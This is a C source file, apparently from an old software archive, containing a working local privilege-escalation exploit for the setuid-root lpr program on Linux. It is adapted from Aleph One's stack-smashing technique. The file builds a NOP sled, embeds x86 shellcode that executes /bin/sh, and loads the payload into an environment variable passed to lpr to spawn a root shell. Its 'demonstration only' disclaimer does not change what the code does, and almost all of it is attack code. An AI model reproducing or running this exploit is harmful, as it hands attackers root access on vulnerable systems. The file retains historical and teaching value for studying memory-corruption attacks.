home *** CD-ROM | disk | FTP | other *** search
- /*
- * lpr_exploit.c - Buffer overflow exploit for the lpr program.
- * Adapted from code found in "stack smashing..." by Aleph One
- * aleph1@underground.org
- *
- * "wisdom is knowledge passed from one to another", Thanks
- * Aleph1
- *
- * This program takes advantage of the buffer overflow condition
- * preset in lpr program. This program is meant as demonstration
- * only, and the author claims no resposibility for its use or
- * misuse. - a42n8k9
- */
-
- #include <stdlib.h>
-
- #define DEFAULT_OFFSET 1023
- #define DEFAULT_BUFFER_SIZE 2289
- #define NOP 0x90
-
- /*
- * The hex representation of the code to produce an interactive shell.
- * Oviously since this is for a Linux Box, you may need to generate the
- * right set for your OS if you are porting this to another UNIX system.
- */
-
- char shellcode [] =
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
- "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
- "\x80\xe8\xdc\xff\xff\xff/bin/sh";
-
- unsigned long get_sp(void)
- {
- __asm__("mov %esp,%eax");
- }
-
- void main(int argc, char *argv[])
- {
- char *buff, *ptr;
- long *addr_ptr, addr;
- int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
- int i;
-
- /* set aside the memory for our shell code */
- if (!(buff = malloc(bsize)))
- {
- printf("Can't allocate memory.\n");
- exit(0);
- }
-
- /* Get the address of our stack pointer */
- addr = get_sp() - offset;
-
- /* fill our buffer with its address */
- ptr = buff;
- addr_ptr = (long *)ptr;
- for(i = 0; i<bsize; i+=4)
- *(addr_ptr++) = addr;
-
- /* fill the first half of the buffer with NOPs */
- for(i=0;i<bsize/2;i++)
- buff[i] = NOP;
-
- /* add in our shell code */
- ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
- for(i=0;i<strlen(shellcode);i++)
- *(ptr++) = shellcode[i];
-
- /* terminate the string */
- buff[bsize - 1] = '\0';
-
- /* load the string into an environment variable */
- memcpy(buff,"EGG=",4);
- putenv(buff);
-
- /*
- * execute the shell command, thus exploiting the overflow
- * since lpr is suid root, a root shell will be spawned
- */
-
- system("lpr $EGG");
- }
-